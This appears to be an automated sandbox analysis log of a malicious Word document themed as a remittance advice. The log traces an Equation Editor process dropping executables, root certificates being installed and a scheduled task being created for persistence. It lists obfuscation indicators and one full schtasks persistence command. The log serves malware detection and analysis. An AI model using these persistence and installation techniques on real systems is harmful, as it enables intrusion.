Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll

Source: C:\Users\user\AppData\Roaming\sharon38892.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: SCB REmittance Advice.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\SCB REmittance Advice.doc

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\sharon38892.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: XRoS.pdb source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr
Source:	Binary string: XRoS.pdbSHA256 source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: sharonzx[1].exe.2.dr, BufferingPage.cs	.Net Code: InitializeComponent
Source: sharon38892.exe.2.dr, BufferingPage.cs	.Net Code: InitializeComponent
Source: XxENUzWteJXT.exe.5.dr, BufferingPage.cs	.Net Code: InitializeComponent
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.cs	.Net Code: TgFEragjVR System.Reflection.Assembly.Load(byte[])
Source: 5.2.sharon38892.exe.4a0000.0.raw.unpack, LoginForm.cs	.Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.sharon38892.exe.31a30e0.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.sharon38892.exe.34085e0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTR

Source: sharonzx[1].exe.2.dr

Static PE information: 0x84844696 [Thu Jun 14 04:35:34 2040 UTC]

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005ECA58 push esp; retf 005Eh	2_2_005ECA59
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005ECA52 push esp; retf 005Eh	2_2_005ECA55
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005DF94D push ebp; retf	2_2_005DF958
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F694F push ecx; ret	2_2_005F695B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F694A push ecx; ret	2_2_005F694B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F6962 push ecx; ret	2_2_005F696B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F691F push ecx; ret	2_2_005F692B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F7C0F push ecx; ret	2_2_005F7C13
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F7C07 push ecx; ret	2_2_005F7C0B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F8028 push eax; ret	2_2_005F8063
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F68FF push ecx; ret	2_2_005F690B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F57FD push edx; ret	2_2_005F57FF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F68FA push ecx; ret	2_2_005F68FB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F7BFA push ecx; ret	2_2_005F7C03
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F57F5 push edx; ret	2_2_005F57F7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005ECAB8 push eax; retf	2_2_005ECAE1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005F68A8 push ecx; ret	2_2_005F68AB
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00258310 push esp; retf 000Ch	5_2_00258311
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_00258757 push esp; retf 000Ch	5_2_00258758
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_002588C9 push esp; retf 000Ch	5_2_002588CA
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_0025AA19 push esp; retf	5_2_0025AA25
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_0025BFA4 pushad ; ret	5_2_0025BFA5
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_046F1E30 pushad ; iretd	5_2_046F1E32
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Code function: 5_2_046F1EBB pushad ; iretd	5_2_046F1EBC
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00178310 push esp; retf 000Dh	14_2_00178311
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_00178757 push esp; retf 000Dh	14_2_00178758
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_001788C9 push esp; retf 000Dh	14_2_001788CA
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 14_2_0017BFA4 pushad ; ret	14_2_0017BFA5
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 21_2_00402AC0 push eax; ret	21_2_00402AD4
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: 21_2_00402AC0 push eax; ret	21_2_00402AFC

Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, GUUGstbSmd7OI8KM1Z.cs	High entropy of concatenated method names: 'ScxvcCwM93', 'JSjv0WZnHM', 'S7Rv8uPWUA', 'MJH8P881xY', 'ps68zOGFla', 'hRfvF13YYQ', 'V42vBpwSdJ', 'E4uvWMKP0X', 'OBnvoOQmPT', 'sU4vErX1FD'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, b9j79nOrpIpE4FqpJQ.cs	High entropy of concatenated method names: 'XtGAkSaEQv', 'TEDA4VHdb6', 'PFFAmRsGLp', 'K4YApyJtsh', 'l8gAxXTgrc', 'inpAZpOCxL', 'Next', 'Next', 'Next', 'NextBytes'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, HQuwQYBFxJiq99eTsrP.cs	High entropy of concatenated method names: 'mBNVdR9bEU', 'wcAVycFScX', 'cYOVrUkpsJ', 'I48VJHMWX6', 'C8dVMLWuYp', 'NRdVsJoFVj', 'ievVTNu9Dp', 'AaCVnfmAKl', 'WovVtRwyU6', 'HoXVC7c3nA'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, Fa2mLkxDVcED3b2JhR.cs	High entropy of concatenated method names: 'bsNYlgssgH', 'FPVYS7eMYr', 'c38YxJvmQu', 'tdNYU0Jt0v', 'ot6Y4wSe4a', 'lMyYmhQBWH', 'ssVYpkcaRp', 'dUeYZYYQr9', 'L08YuPAnBm', 'As6YbrNsSL'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, q2eJsEEhft2IWeOyJV.cs	High entropy of concatenated method names: 'fQ0BvxLwNx', 'fkfBgXAmWX', 'CbrBRGgGYv', 'QjTBQYSDTK', 'uK3BYdgdrn', 'cZGBasLgoJ', 'C7vyn8CuH4FBIjpWB3', 'htqMA5whJ5pnaJbvfH', 'tQmBBrHWWJ', 'KQHBoEop79'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, Kr0XM5BohuwmGLFWocb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'RJsKxQBXFP', 'Kv0KUrsh3S', 'OOPK6nEvDP', 'qhbKHWWIOO', 'lhfK9JonMJ', 'KClKIuqWoN', 'bjfKwijK07'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, ng8CCcP15peLhrjZl7.cs	High entropy of concatenated method names: 'UdrVBXDRSC', 'yKkVoRq9lo', 'MU2VE79j0E', 'G7mVciP8cH', 'I31VG2iPN9', 'OsKV5oVOqI', 'ms5V8wFJ3i', 'rHRAwf5lp0', 'L5YANr6Wqg', 'fQaAOjP65o'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, gw2ephibsLpAsMI8xN.cs	High entropy of concatenated method names: 'EmQvdNffj2', 'e1mvysE0C1', 'yoTvrNrH7k', 'r7jvJRuDkU', 'WOUvMnr6r4', 'hchvscqx5c', 'rL2vTsDVCQ', 'NLZvnefGAK', 'VNyvtXNHe6', 'hemvCdJbMt'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, g0tMcQgBCb6VGP169Q.cs	High entropy of concatenated method names: 'JQlohUerpT', 'V1bocW9DNW', 'x3poGo6WL7', 'Nnho0eUkn3', 'sgwo5dFMxG', 'oZao8wkl06', 'GoAovQtvQx', 'UO9ogCt8ad', 'UepoDXtDVH', 'pr3oRXPq14'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, nGq4u2GTAdEScdFQ9J.cs	High entropy of concatenated method names: 'Dispose', 'MPoBOnl9lv', 'cnCW4Buk5c', 'Xtj33RPJUP', 'IUTBPnPTDW', 'DMiBzffqYh', 'ProcessDialogKey', 'nLBWF9j79n', 'zpIWBpE4Fq', 'JJQWWfg8CC'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, RTnPTDNWTMiffqYhfL.cs	High entropy of concatenated method names: 'vWwAcdIsCS', 'TDbAGhIjTP', 'dJfA0LgRyn', 'kwQA5aN7sC', 'uGhA8S7Ptf', 'KItAvLgUUF', 'HF0AgmjEIC', 'cboAD38o15', 'uRsARo9Eac', 'Eb4AQRMRBT'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, M2V7tMHwBcrZuxvNAK.cs	High entropy of concatenated method names: 'WEl2RbRhV0', 'OBE2QAeJqM', 'ToString', 'fnD2cI8Yh4', 'Nw62GMaDDw', 'PF320vLGAp', 'UPL25VvRY1', 'L9S28m13uC', 'wD12vCw1to', 'Uff2glApHd'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, ODTKZhCDXOLTgeK3dg.cs	High entropy of concatenated method names: 'Ode5M1wJnb', 'HI95TyHHP5', 'FTX0mffRBi', 'x890pE0Ewj', 'ImF0ZhOrEA', 'vKj0uJM1Gi', 'Pns0bruOCo', 'NH701icxel', 'kpC0ivR8D6', 'puK0l4xKtv'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, hxLwNxnckfXAmWXICd.cs	High entropy of concatenated method names: 'QH9GxEpeWh', 'MAJGUgO9sQ', 'ppBG6gmAZF', 'f9fGH67Lls', 'f0bG9XNQAa', 'O9kGIyEjgF', 'eSmGw6OEXK', 'QvmGNH5LO1', 'thtGOwX21n', 'Q6GGPQtWBf'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, mZ7saqjYtSTEYbUQUZ.cs	High entropy of concatenated method names: 'eaXfndPrEB', 'amwftCg7vF', 'brFfkJBi8c', 'rtGf4Dy8j1', 'Tl9fpdavrR', 'Un2fZKGYY1', 'DsrfbsyVOH', 'Buff1c0tRY', 'm3XfliN9m0', 'ejpf3I2nMU'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, LZFdEvIIaEZUtISyW2.cs	High entropy of concatenated method names: 'yE62NBDpDb', 'i642Pj4o2H', 'OwuAFLsIjL', 'k3YAB1wmAM', 'yBn23lAukL', 'FjO2Su8aHU', 'gG32jHCNMH', 'x1l2xh4LFn', 'fgq2UQthSM', 'axX26i9qwf'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, YLiES1WHhaRR217u52.cs	High entropy of concatenated method names: 'keZrISNbU', 'aFFJBnYdE', 'NiksSADgL', 'qwpTnCGax', 'sRDtAPoLT', 'BQbCI5fdx', 'zp5c8vSJQwQdvPHVjF', 'hNv8cujWHIVldHOypn', 'jj8A9qFC0', 'LAbKKZWF4'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, xrnWZGksLgoJo1blU6.cs	High entropy of concatenated method names: 'HMk8hZMJbV', 'Iqk8G3laAw', 'JlC85w5rS6', 'TAa8vtR0rF', 'Vi18gfwJG3', 'hBa593rObE', 'edV5IkLZPQ', 'aVt5wHi7NQ', 'ovP5NmCMn9', 'K3c5ObdAh8'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, KGUs3stbrGgGYvjjTY.cs	High entropy of concatenated method names: 'NLJ0J1bxVO', 'qSj0s706nF', 'LYJ0nTQXXe', 'z6V0teRyji', 'wDO0YTbNaT', 'AoW0atQBND', 'Dfc02dwMma', 'x0y0AGboRT', 'TT10VjQoNK', 'O8c0KfTcLo'
Source: 5.2.sharon38892.exe.34bfec0.10.raw.unpack, M5wBeyzXs6BolJjqtJ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oJRVf1M9Zg', 'uNjVY9ixYp', 'NgrVawuR2C', 'Gf1V22STUI', 'cV3VASNyqR', 'btTVVLLi84', 'a1LVKpR1B7'

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\sharon38892.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Roaming\sharon38892.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
